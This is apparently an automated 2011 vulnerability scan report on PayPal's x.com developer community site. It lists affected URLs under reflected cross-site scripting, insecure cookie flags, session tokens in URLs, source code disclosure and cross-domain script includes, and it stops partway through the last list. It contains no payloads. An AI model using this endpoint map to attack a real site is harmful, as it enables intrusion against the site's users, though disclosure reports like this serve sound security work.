XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, x.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Fri Aug 12 09:27:09 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. https://www.x.com/blogs/ [name of an arbitrarily supplied request parameter]

1.2. https://www.x.com/community/ppx/xspaces/introduce [name of an arbitrarily supplied request parameter]

2. SSL cookie without secure flag set

2.1. https://www.x.com/

2.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

2.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

2.4. https://www.x.com/community/home

2.5. https://www.x.com/community/ppx

2.6. https://www.x.com/community/ppx/adaptive_accounts

2.7. https://www.x.com/community/ppx/adaptive_payments

2.8. https://www.x.com/community/ppx/apps101

2.9. https://www.x.com/community/ppx/authentication

2.10. https://www.x.com/community/ppx/businesspayments

2.11. https://www.x.com/community/ppx/button_manager

2.12. https://www.x.com/community/ppx/code_samples

2.13. https://www.x.com/community/ppx/dev-tools

2.14. https://www.x.com/community/ppx/dev-tools/decision_tree

2.15. https://www.x.com/community/ppx/devchallenge

2.16. https://www.x.com/community/ppx/devchallenge/

2.17. https://www.x.com/community/ppx/developer

2.18. https://www.x.com/community/ppx/devtalk

2.19. https://www.x.com/community/ppx/devzone

2.20. https://www.x.com/community/ppx/documentation

2.21. https://www.x.com/community/ppx/ec

2.22. https://www.x.com/community/ppx/feedback

2.23. https://www.x.com/community/ppx/fundraising

2.24. https://www.x.com/community/ppx/global

2.25. https://www.x.com/community/ppx/global/au

2.26. https://www.x.com/community/ppx/global/ca

2.27. https://www.x.com/community/ppx/global/cn

2.28. https://www.x.com/community/ppx/global/de

2.29. https://www.x.com/community/ppx/global/fr

2.30. https://www.x.com/community/ppx/global/it

2.31. https://www.x.com/community/ppx/global/jp

2.32. https://www.x.com/community/ppx/global/mx

2.33. https://www.x.com/community/ppx/global/nl

2.34. https://www.x.com/community/ppx/global/sp

2.35. https://www.x.com/community/ppx/global/uk

2.36. https://www.x.com/community/ppx/ipn

2.37. https://www.x.com/community/ppx/marketplaces

2.38. https://www.x.com/community/ppx/mass_pay

2.39. https://www.x.com/community/ppx/offlineanddevices

2.40. https://www.x.com/community/ppx/p2p

2.41. https://www.x.com/community/ppx/payflow_link

2.42. https://www.x.com/community/ppx/payflow_pro

2.43. https://www.x.com/community/ppx/payflow_xml_reporting

2.44. https://www.x.com/community/ppx/pdt

2.45. https://www.x.com/community/ppx/permissions

2.46. https://www.x.com/community/ppx/press

2.47. https://www.x.com/community/ppx/recurring_billing

2.48. https://www.x.com/community/ppx/recurring_payments

2.49. https://www.x.com/community/ppx/release_notes

2.50. https://www.x.com/community/ppx/sdks

2.51. https://www.x.com/community/ppx/showcase

2.52. https://www.x.com/community/ppx/showcase/ap_directory

2.53. https://www.x.com/community/ppx/support

2.54. https://www.x.com/community/ppx/system_status

2.55. https://www.x.com/community/ppx/testing

2.56. https://www.x.com/community/ppx/training

2.57. https://www.x.com/community/ppx/transaction_information

2.58. https://www.x.com/community/ppx/vt

2.59. https://www.x.com/community/ppx/website_reporting

2.60. https://www.x.com/community/ppx/wpp

2.61. https://www.x.com/community/ppx/wpphosted

2.62. https://www.x.com/community/ppx/wps

2.63. https://www.x.com/community/ppx/xspaces

2.64. https://www.x.com/community/ppx/xspaces/accelerator

2.65. https://www.x.com/community/ppx/xspaces/certification

2.66. https://www.x.com/community/ppx/xspaces/cloud-computing

2.67. https://www.x.com/community/ppx/xspaces/digital_goods

2.68. https://www.x.com/community/ppx/xspaces/finance

2.69. https://www.x.com/community/ppx/xspaces/forums

2.70. https://www.x.com/community/ppx/xspaces/gaming

2.71. https://www.x.com/community/ppx/xspaces/identity

2.72. https://www.x.com/community/ppx/xspaces/innovate

2.73. https://www.x.com/community/ppx/xspaces/introduce

2.74. https://www.x.com/community/ppx/xspaces/mobile

2.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

2.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

2.77. https://www.x.com/community/ppx/xspaces/security

2.78. https://www.x.com/community/ppx/xspaces/social

2.79. https://www.x.com/community/ppx/xspaces/subscriptions

2.80. https://www.x.com/community/ppx/xspaces/toolkits

2.81. https://www.x.com/community/ppx/xspaces/web_checkout

2.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

2.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

2.84. https://www.x.com/community/xcommerce-blogs

2.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

2.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

2.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

2.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

2.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

2.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

2.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

2.92. https://www.x.com/docs/DOC-1031

2.93. https://www.x.com/docs/DOC-1041

2.94. https://www.x.com/docs/DOC-1051

2.95. https://www.x.com/docs/DOC-1106

2.96. https://www.x.com/docs/DOC-1108

2.97. https://www.x.com/docs/DOC-1116

2.98. https://www.x.com/docs/DOC-1176

2.99. https://www.x.com/docs/DOC-1204

2.100. https://www.x.com/docs/DOC-1216

2.101. https://www.x.com/docs/DOC-1332

2.102. https://www.x.com/docs/DOC-1372

2.103. https://www.x.com/docs/DOC-1374

2.104. https://www.x.com/docs/DOC-1401

2.105. https://www.x.com/docs/DOC-1431

2.106. https://www.x.com/docs/DOC-1551

2.107. https://www.x.com/docs/DOC-1613

2.108. https://www.x.com/docs/DOC-2241

2.109. https://www.x.com/docs/DOC-2346

2.110. https://www.x.com/docs/DOC-3201

2.111. https://www.x.com/docs/DOC-3212

2.112. https://www.x.com/docs/DOC-3251

2.113. https://www.x.com/docs/DOC-3271

2.114. https://www.x.com/docs/DOC-3321

2.115. https://www.x.com/docs/DOC-3322

2.116. https://www.x.com/docs/DOC-3323

2.117. https://www.x.com/docs/DOC-3345

2.118. https://www.x.com/docs/DOC-3351

2.119. https://www.x.com/docs/DOC-3352

2.120. https://www.x.com/docs/DOC-3353

2.121. https://www.x.com/docs/DOC-3354

2.122. https://www.x.com/docs/DOC-3355

2.123. https://www.x.com/docs/DOC-3371

2.124. https://www.x.com/docs/DOC-3372

2.125. https://www.x.com/docs/DOC-3373

2.126. https://www.x.com/docs/DOC-3374

2.127. https://www.x.com/docs/DOC-3375

2.128. https://www.x.com/docs/DOC-3426

2.129. https://www.x.com/docs/DOC-3427

2.130. https://www.x.com/docs/DOC-3431

2.131. https://www.x.com/docs/DOC-3443

2.132. https://www.x.com/docs/DOC-3444

2.133. https://www.x.com/docs/DOC-3491

2.134. https://www.x.com/docs/DOC-3561

2.135. https://www.x.com/docs/DOC-3562

2.136. https://www.x.com/docs/DOC-3619

2.137. https://www.x.com/docs/DOC-3688

2.138. https://www.x.com/docs/DOC-3811

2.139. https://www.x.com/docs/DOC-3812

2.140. https://www.x.com/docs/DOC-3836

2.141. https://www.x.com/docs/DOC-3841

2.142. https://www.x.com/message/186684

2.143. https://www.x.com/message/198017

2.144. https://www.x.com/message/211333

2.145. https://www.x.com/message/211439

2.146. https://www.x.com/message/211738

2.147. https://www.x.com/message/212001

2.148. https://www.x.com/message/212124

2.149. https://www.x.com/message/212170

2.150. https://www.x.com/message/212753

2.151. https://www.x.com/message/212906

2.152. https://www.x.com/message/213354

2.153. https://www.x.com/message/213546

2.154. https://www.x.com/message/213568

2.155. https://www.x.com/message/213571

2.156. https://www.x.com/message/213767

2.157. https://www.x.com/message/213787

2.158. https://www.x.com/message/213788

2.159. https://www.x.com/message/213865

2.160. https://www.x.com/message/214347

2.161. https://www.x.com/message/214440

2.162. https://www.x.com/message/214618

2.163. https://www.x.com/message/214902

2.164. https://www.x.com/message/214926

2.165. https://www.x.com/message/215245

2.166. https://www.x.com/message/215254

2.167. https://www.x.com/message/215264

2.168. https://www.x.com/message/215276

2.169. https://www.x.com/message/215291

2.170. https://www.x.com/people/BaldGeek

2.171. https://www.x.com/people/CorinneSherman

2.172. https://www.x.com/people/GiancarloUk2

2.173. https://www.x.com/people/IndieReign

2.174. https://www.x.com/people/JasonVenner

2.175. https://www.x.com/people/MrcheckAPX

2.176. https://www.x.com/people/PP_Igor

2.177. https://www.x.com/people/PP_MTS_Andre

2.178. https://www.x.com/people/PP_MTS_Chad

2.179. https://www.x.com/people/PP_MTS_GuidoT

2.180. https://www.x.com/people/PP_MTS_Magarvin

2.181. https://www.x.com/people/PP_MTS_Patrick

2.182. https://www.x.com/people/PayPalXadmin

2.183. https://www.x.com/people/PayPal_Carolyn

2.184. https://www.x.com/people/PayPal_Sudha

2.185. https://www.x.com/people/PayPal_ToddS

2.186. https://www.x.com/people/Praveen

2.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

2.188. https://www.x.com/people/RightWayMail

2.189. https://www.x.com/people/S.Aijaz

2.190. https://www.x.com/people/SRS

2.191. https://www.x.com/people/Saleem

2.192. https://www.x.com/people/Shade8934

2.193. https://www.x.com/people/Suneetha

2.194. https://www.x.com/people/admin

2.195. https://www.x.com/people/amypiazza00

2.196. https://www.x.com/people/angelleye

2.197. https://www.x.com/people/billday

2.198. https://www.x.com/people/blingnation2010

2.199. https://www.x.com/people/bryngregory

2.200. https://www.x.com/people/das_licht

2.201. https://www.x.com/people/dchankhour

2.202. https://www.x.com/people/eferreira

2.203. https://www.x.com/people/encore

2.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

2.205. https://www.x.com/people/gazugafan

2.206. https://www.x.com/people/gem

2.207. https://www.x.com/people/gogoeric

2.208. https://www.x.com/people/hotellina

2.209. https://www.x.com/people/iConcessionStand

2.210. https://www.x.com/people/joncas

2.211. https://www.x.com/people/lwhite2104

2.212. https://www.x.com/people/mandeheritage

2.213. https://www.x.com/people/odeskdev

2.214. https://www.x.com/people/omuleanu

2.215. https://www.x.com/people/pluto26

2.216. https://www.x.com/people/posiden5665

2.217. https://www.x.com/people/ramonmorales123

2.218. https://www.x.com/people/rizkygarut

2.219. https://www.x.com/people/roguereptile

2.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

2.221. https://www.x.com/people/sebastian.kopp@wooga.com

2.222. https://www.x.com/people/skier

3. Session token in URL

3.1. https://www.x.com/images/transparent.png

3.2. https://www.x.com/index.jspa

3.3. https://www.x.com/login.jspa

3.4. https://www.x.com/people/Bill_at_Repaid.com/avatar

3.5. https://www.x.com/people/DaveLeWave/avatar

3.6. https://www.x.com/people/Jareth_2005/avatar

3.7. https://www.x.com/people/Maxatnes/avatar

3.8. https://www.x.com/people/Murugesh_cit/avatar

3.9. https://www.x.com/people/NetGuy/avatar

3.10. https://www.x.com/people/PP_MTS_Chad/avatar

3.11. https://www.x.com/people/PP_MTS_Magarvin/avatar

3.12. https://www.x.com/people/Saveby/avatar

3.13. https://www.x.com/people/TrainingPal/avatar

3.14. https://www.x.com/people/WebBusinessDeveloper/avatar

3.15. https://www.x.com/people/advance-software/avatar

3.16. https://www.x.com/people/alfrednutile/avatar

3.17. https://www.x.com/people/appcode/avatar

3.18. https://www.x.com/people/cariad/avatar

3.19. https://www.x.com/people/christiancrest/avatar

3.20. https://www.x.com/people/ezimerchant/avatar

3.21. https://www.x.com/people/inhouse/avatar

3.22. https://www.x.com/people/jameshill/avatar

3.23. https://www.x.com/people/judemichael2001/avatar

3.24. https://www.x.com/people/lilbugclothing/avatar

3.25. https://www.x.com/people/lovelycar8888/avatar

3.26. https://www.x.com/people/lurobertson/avatar

3.27. https://www.x.com/people/mbtmobile/avatar

3.28. https://www.x.com/people/michaelcaplan/avatar

3.29. https://www.x.com/people/mikertjones/avatar

3.30. https://www.x.com/people/moneygun/avatar

3.31. https://www.x.com/people/pdumas/avatar

3.32. https://www.x.com/people/structuralartistry/avatar

3.33. https://www.x.com/people/theatreus/avatar

3.34. https://www.x.com/people/thomlizpa/avatar

3.35. https://www.x.com/people/tifroz/avatar

3.36. https://www.x.com/people/tim_hunt/avatar

3.37. https://www.x.com/people/timneu22/avatar

3.38. https://www.x.com/people/vmchatt/avatar

3.39. https://www.x.com/people/xavijr/avatar

3.40. https://www.x.com/plugins/app-type-plugin/styles/app.css

3.41. https://www.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css

3.42. https://www.x.com/plugins/content-widgets/classes/community-widget.css

3.43. https://www.x.com/plugins/digg-style-voting/scripts/plugin.js

3.44. https://www.x.com/plugins/digg-style-voting/styles/plugin.css

3.45. https://www.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css

3.46. https://www.x.com/plugins/idea-type-plugin/resources/styles/idea.css

3.47. https://www.x.com/resources/images/status/statusicon-01.gif

3.48. https://www.x.com/resources/scripts/fancyzoom/images/

3.49. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

3.50. https://www.x.com/resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

3.51. https://www.x.com/styles/jive-community.css

3.52. https://www.x.com/styles/jive-videomodule.css

3.53. https://www.x.com/themes/paypal/images/favicon.ico

3.54. https://www.x.com/themes/paypal/images/favicon.png

3.55. https://www.x.com/themes/paypal/images/paypal_x_group_logo.png

3.56. https://www.x.com/themes/paypal/js/custom.js

4. Cookie without HttpOnly flag set

4.1. https://www.x.com/

4.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

4.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

4.4. https://www.x.com/community/home

4.5. https://www.x.com/community/ppx

4.6. https://www.x.com/community/ppx/adaptive_accounts

4.7. https://www.x.com/community/ppx/adaptive_payments

4.8. https://www.x.com/community/ppx/apps101

4.9. https://www.x.com/community/ppx/authentication

4.10. https://www.x.com/community/ppx/businesspayments

4.11. https://www.x.com/community/ppx/button_manager

4.12. https://www.x.com/community/ppx/code_samples

4.13. https://www.x.com/community/ppx/dev-tools

4.14. https://www.x.com/community/ppx/dev-tools/decision_tree

4.15. https://www.x.com/community/ppx/devchallenge

4.16. https://www.x.com/community/ppx/devchallenge/

4.17. https://www.x.com/community/ppx/developer

4.18. https://www.x.com/community/ppx/devtalk

4.19. https://www.x.com/community/ppx/devzone

4.20. https://www.x.com/community/ppx/documentation

4.21. https://www.x.com/community/ppx/ec

4.22. https://www.x.com/community/ppx/feedback

4.23. https://www.x.com/community/ppx/fundraising

4.24. https://www.x.com/community/ppx/global

4.25. https://www.x.com/community/ppx/global/au

4.26. https://www.x.com/community/ppx/global/ca

4.27. https://www.x.com/community/ppx/global/cn

4.28. https://www.x.com/community/ppx/global/de

4.29. https://www.x.com/community/ppx/global/fr

4.30. https://www.x.com/community/ppx/global/it

4.31. https://www.x.com/community/ppx/global/jp

4.32. https://www.x.com/community/ppx/global/mx

4.33. https://www.x.com/community/ppx/global/nl

4.34. https://www.x.com/community/ppx/global/sp

4.35. https://www.x.com/community/ppx/global/uk

4.36. https://www.x.com/community/ppx/ipn

4.37. https://www.x.com/community/ppx/marketplaces

4.38. https://www.x.com/community/ppx/mass_pay

4.39. https://www.x.com/community/ppx/offlineanddevices

4.40. https://www.x.com/community/ppx/p2p

4.41. https://www.x.com/community/ppx/payflow_link

4.42. https://www.x.com/community/ppx/payflow_pro

4.43. https://www.x.com/community/ppx/payflow_xml_reporting

4.44. https://www.x.com/community/ppx/pdt

4.45. https://www.x.com/community/ppx/permissions

4.46. https://www.x.com/community/ppx/press

4.47. https://www.x.com/community/ppx/recurring_billing

4.48. https://www.x.com/community/ppx/recurring_payments

4.49. https://www.x.com/community/ppx/release_notes

4.50. https://www.x.com/community/ppx/sdks

4.51. https://www.x.com/community/ppx/showcase

4.52. https://www.x.com/community/ppx/showcase/ap_directory

4.53. https://www.x.com/community/ppx/support

4.54. https://www.x.com/community/ppx/system_status

4.55. https://www.x.com/community/ppx/testing

4.56. https://www.x.com/community/ppx/training

4.57. https://www.x.com/community/ppx/transaction_information

4.58. https://www.x.com/community/ppx/vt

4.59. https://www.x.com/community/ppx/website_reporting

4.60. https://www.x.com/community/ppx/wpp

4.61. https://www.x.com/community/ppx/wpphosted

4.62. https://www.x.com/community/ppx/wps

4.63. https://www.x.com/community/ppx/xspaces

4.64. https://www.x.com/community/ppx/xspaces/accelerator

4.65. https://www.x.com/community/ppx/xspaces/certification

4.66. https://www.x.com/community/ppx/xspaces/cloud-computing

4.67. https://www.x.com/community/ppx/xspaces/digital_goods

4.68. https://www.x.com/community/ppx/xspaces/finance

4.69. https://www.x.com/community/ppx/xspaces/forums

4.70. https://www.x.com/community/ppx/xspaces/gaming

4.71. https://www.x.com/community/ppx/xspaces/identity

4.72. https://www.x.com/community/ppx/xspaces/innovate

4.73. https://www.x.com/community/ppx/xspaces/introduce

4.74. https://www.x.com/community/ppx/xspaces/mobile

4.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

4.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

4.77. https://www.x.com/community/ppx/xspaces/security

4.78. https://www.x.com/community/ppx/xspaces/social

4.79. https://www.x.com/community/ppx/xspaces/subscriptions

4.80. https://www.x.com/community/ppx/xspaces/toolkits

4.81. https://www.x.com/community/ppx/xspaces/web_checkout

4.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

4.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

4.84. https://www.x.com/community/xcommerce-blogs

4.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

4.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

4.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

4.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

4.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

4.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

4.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

4.92. https://www.x.com/docs/DOC-1031

4.93. https://www.x.com/docs/DOC-1041

4.94. https://www.x.com/docs/DOC-1051

4.95. https://www.x.com/docs/DOC-1106

4.96. https://www.x.com/docs/DOC-1108

4.97. https://www.x.com/docs/DOC-1116

4.98. https://www.x.com/docs/DOC-1176

4.99. https://www.x.com/docs/DOC-1204

4.100. https://www.x.com/docs/DOC-1216

4.101. https://www.x.com/docs/DOC-1332

4.102. https://www.x.com/docs/DOC-1372

4.103. https://www.x.com/docs/DOC-1374

4.104. https://www.x.com/docs/DOC-1401

4.105. https://www.x.com/docs/DOC-1431

4.106. https://www.x.com/docs/DOC-1551

4.107. https://www.x.com/docs/DOC-1613

4.108. https://www.x.com/docs/DOC-2241

4.109. https://www.x.com/docs/DOC-2346

4.110. https://www.x.com/docs/DOC-3201

4.111. https://www.x.com/docs/DOC-3212

4.112. https://www.x.com/docs/DOC-3251

4.113. https://www.x.com/docs/DOC-3271

4.114. https://www.x.com/docs/DOC-3321

4.115. https://www.x.com/docs/DOC-3322

4.116. https://www.x.com/docs/DOC-3323

4.117. https://www.x.com/docs/DOC-3345

4.118. https://www.x.com/docs/DOC-3351

4.119. https://www.x.com/docs/DOC-3352

4.120. https://www.x.com/docs/DOC-3353

4.121. https://www.x.com/docs/DOC-3354

4.122. https://www.x.com/docs/DOC-3355

4.123. https://www.x.com/docs/DOC-3371

4.124. https://www.x.com/docs/DOC-3372

4.125. https://www.x.com/docs/DOC-3373

4.126. https://www.x.com/docs/DOC-3374

4.127. https://www.x.com/docs/DOC-3375

4.128. https://www.x.com/docs/DOC-3426

4.129. https://www.x.com/docs/DOC-3427

4.130. https://www.x.com/docs/DOC-3431

4.131. https://www.x.com/docs/DOC-3443

4.132. https://www.x.com/docs/DOC-3444

4.133. https://www.x.com/docs/DOC-3491

4.134. https://www.x.com/docs/DOC-3561

4.135. https://www.x.com/docs/DOC-3562

4.136. https://www.x.com/docs/DOC-3619

4.137. https://www.x.com/docs/DOC-3688

4.138. https://www.x.com/docs/DOC-3811

4.139. https://www.x.com/docs/DOC-3812

4.140. https://www.x.com/docs/DOC-3836

4.141. https://www.x.com/docs/DOC-3841

4.142. https://www.x.com/message/186684

4.143. https://www.x.com/message/198017

4.144. https://www.x.com/message/211333

4.145. https://www.x.com/message/211439

4.146. https://www.x.com/message/211738

4.147. https://www.x.com/message/212001

4.148. https://www.x.com/message/212124

4.149. https://www.x.com/message/212170

4.150. https://www.x.com/message/212753

4.151. https://www.x.com/message/212906

4.152. https://www.x.com/message/213354

4.153. https://www.x.com/message/213546

4.154. https://www.x.com/message/213568

4.155. https://www.x.com/message/213571

4.156. https://www.x.com/message/213767

4.157. https://www.x.com/message/213787

4.158. https://www.x.com/message/213788

4.159. https://www.x.com/message/213865

4.160. https://www.x.com/message/214347

4.161. https://www.x.com/message/214440

4.162. https://www.x.com/message/214618

4.163. https://www.x.com/message/214902

4.164. https://www.x.com/message/214926

4.165. https://www.x.com/message/215245

4.166. https://www.x.com/message/215254

4.167. https://www.x.com/message/215264

4.168. https://www.x.com/message/215276

4.169. https://www.x.com/message/215291

4.170. https://www.x.com/people/BaldGeek

4.171. https://www.x.com/people/CorinneSherman

4.172. https://www.x.com/people/GiancarloUk2

4.173. https://www.x.com/people/IndieReign

4.174. https://www.x.com/people/JasonVenner

4.175. https://www.x.com/people/MrcheckAPX

4.176. https://www.x.com/people/PP_Igor

4.177. https://www.x.com/people/PP_MTS_Andre

4.178. https://www.x.com/people/PP_MTS_Chad

4.179. https://www.x.com/people/PP_MTS_GuidoT

4.180. https://www.x.com/people/PP_MTS_Magarvin

4.181. https://www.x.com/people/PP_MTS_Patrick

4.182. https://www.x.com/people/PayPalXadmin

4.183. https://www.x.com/people/PayPal_Carolyn

4.184. https://www.x.com/people/PayPal_Sudha

4.185. https://www.x.com/people/PayPal_ToddS

4.186. https://www.x.com/people/Praveen

4.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

4.188. https://www.x.com/people/RightWayMail

4.189. https://www.x.com/people/S.Aijaz

4.190. https://www.x.com/people/SRS

4.191. https://www.x.com/people/Saleem

4.192. https://www.x.com/people/Shade8934

4.193. https://www.x.com/people/Suneetha

4.194. https://www.x.com/people/admin

4.195. https://www.x.com/people/amypiazza00

4.196. https://www.x.com/people/angelleye

4.197. https://www.x.com/people/billday

4.198. https://www.x.com/people/blingnation2010

4.199. https://www.x.com/people/bryngregory

4.200. https://www.x.com/people/das_licht

4.201. https://www.x.com/people/dchankhour

4.202. https://www.x.com/people/eferreira

4.203. https://www.x.com/people/encore

4.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

4.205. https://www.x.com/people/gazugafan

4.206. https://www.x.com/people/gem

4.207. https://www.x.com/people/gogoeric

4.208. https://www.x.com/people/hotellina

4.209. https://www.x.com/people/iConcessionStand

4.210. https://www.x.com/people/joncas

4.211. https://www.x.com/people/lwhite2104

4.212. https://www.x.com/people/mandeheritage

4.213. https://www.x.com/people/odeskdev

4.214. https://www.x.com/people/omuleanu

4.215. https://www.x.com/people/pluto26

4.216. https://www.x.com/people/posiden5665

4.217. https://www.x.com/people/ramonmorales123

4.218. https://www.x.com/people/rizkygarut

4.219. https://www.x.com/people/roguereptile

4.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

4.221. https://www.x.com/people/sebastian.kopp@wooga.com

4.222. https://www.x.com/people/skier

5. Source code disclosure

5.1. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

5.2. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

5.3. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

5.4. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

5.5. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

5.6. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

5.7. https://www.x.com/themes/paypal/js/custom.js

6. Cross-domain Referer leakage

6.1. https://www.x.com/community/feeds

6.2. https://www.x.com/community/ppx

6.3. https://www.x.com/community/ppx/button_manager

6.4. https://www.x.com/community/ppx/dev-tools

6.5. https://www.x.com/community/ppx/developer

6.6. https://www.x.com/community/ppx/ec

6.7. https://www.x.com/community/ppx/global

6.8. https://www.x.com/community/ppx/showcase

6.9. https://www.x.com/community/ppx/xspaces

6.10. https://www.x.com/community/ppx/xspaces/accelerator

6.11. https://www.x.com/community/ppx/xspaces/certification

6.12. https://www.x.com/community/ppx/xspaces/cloud-computing

6.13. https://www.x.com/community/ppx/xspaces/digital_goods

6.14. https://www.x.com/community/ppx/xspaces/finance

6.15. https://www.x.com/community/ppx/xspaces/forums

6.16. https://www.x.com/community/ppx/xspaces/gaming

6.17. https://www.x.com/community/ppx/xspaces/identity

6.18. https://www.x.com/community/ppx/xspaces/innovate

6.19. https://www.x.com/community/ppx/xspaces/introduce

6.20. https://www.x.com/community/ppx/xspaces/mobile

6.21. https://www.x.com/community/ppx/xspaces/security

6.22. https://www.x.com/community/ppx/xspaces/social

6.23. https://www.x.com/community/ppx/xspaces/subscriptions

6.24. https://www.x.com/community/ppx/xspaces/web_checkout

6.25. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

6.26. https://www.x.com/community/xcommerce-blogs

6.27. https://www.x.com/docs/DOC-1106

6.28. https://www.x.com/index.jspa

6.29. https://www.x.com/people

6.30. https://www.x.com/people/BaldGeek

6.31. https://www.x.com/tags

7. Cross-domain script include

7.1. https://www.x.com/blogs/

7.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

7.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

7.4. https://www.x.com/bookmarks/

7.5. https://www.x.com/community/

7.6. https://www.x.com/community/emailPasswordToken!input.jspa

7.7. https://www.x.com/community/feeds

7.8. https://www.x.com/community/home

7.9. https://www.x.com/community/ppx

7.10. https://www.x.com/community/ppx/adaptive_accounts

7.11. https://www.x.com/community/ppx/adaptive_payments

7.12. https://www.x.com/community/ppx/apps101

7.13. https://www.x.com/community/ppx/authentication

7.14. https://www.x.com/community/ppx/businesspayments

7.15. https://www.x.com/community/ppx/button_manager

7.16. https://www.x.com/community/ppx/code_samples

7.17. https://www.x.com/community/ppx/dev-tools

7.18. https://www.x.com/community/ppx/dev-tools/decision_tree

7.19. https://www.x.com/community/ppx/devchallenge

7.20. https://www.x.com/community/ppx/devchallenge/

7.21. https://www.x.com/community/ppx/developer

7.22. https://www.x.com/community/ppx/devtalk

7.23. https://www.x.com/community/ppx/devzone

7.24. https://www.x.com/community/ppx/documentation

7.25. https://www.x.com/community/ppx/ec

7.26. https://www.x.com/community/ppx/emailPasswordToken!input.jspa

7.27. https://www.x.com/community/ppx/feedback

7.28. https://www.x.com/community/ppx/fundraising

7.29. https://www.x.com/community/ppx/global

7.30. https://www.x.com/community/ppx/global/au

7.31. https://www.x.com/community/ppx/global/ca

7.32. https://www.x.com/community/ppx/global/cn

7.33. https://www.x.com/community/ppx/global/de

7.34. https://www.x.com/community/ppx/global/fr

7.35. https://www.x.com/community/ppx/global/it

7.36. https://www.x.com/community/ppx/global/jp

7.37. https://www.x.com/community/ppx/global/mx

7.38. https://www.x.com/community/ppx/global/nl

7.39. https://www.x.com/community/ppx/global/sp

7.40. https://www.x.com/community/ppx/global/uk

7.41. https://www.x.com/community/ppx/ipn

7.42. https://www.x.com/community/ppx/marketplaces

7.43. https://www.x.com/community/ppx/mass_pay

7.44. https://www.x.com/community/ppx/offlineanddevices

7.45. https://www.x.com/community/ppx/p2p

7.46. https://www.x.com/community/ppx/payflow_link

7.47. https://www.x.com/community/ppx/payflow_pro

7.48. https://www.x.com/community/ppx/payflow_xml_reporting

7.49. https://www.x.com/community/ppx/pdt

7.50. https://www.x.com/community/ppx/permissions

7.51. https://www.x.com/community/ppx/press

7.52. https://www.x.com/community/ppx/recurring_billing

7.53. https://www.x.com/community/ppx/recurring_payments

7.54. https://www.x.com/community/ppx/release_notes

7.55. https://www.x.com/community/ppx/sdks

7.56. https://www.x.com/community/ppx/showcase

7.57. https://www.x.com/community/ppx/showcase/ap_directory

7.58. https://www.x.com/community/ppx/support

7.59. https://www.x.com/community/ppx/system_status

7.60. https://www.x.com/community/ppx/testing

7.61. https://www.x.com/community/ppx/training

7.62. https://www.x.com/community/ppx/transaction_information

7.63. https://www.x.com/community/ppx/vt

7.64. https://www.x.com/community/ppx/website_reporting

7.65. https://www.x.com/community/ppx/wpp

7.66. https://www.x.com/community/ppx/wpphosted

7.67. https://www.x.com/community/ppx/wps

7.68. https://www.x.com/community/ppx/xspaces

7.69. https://www.x.com/community/ppx/xspaces/accelerator

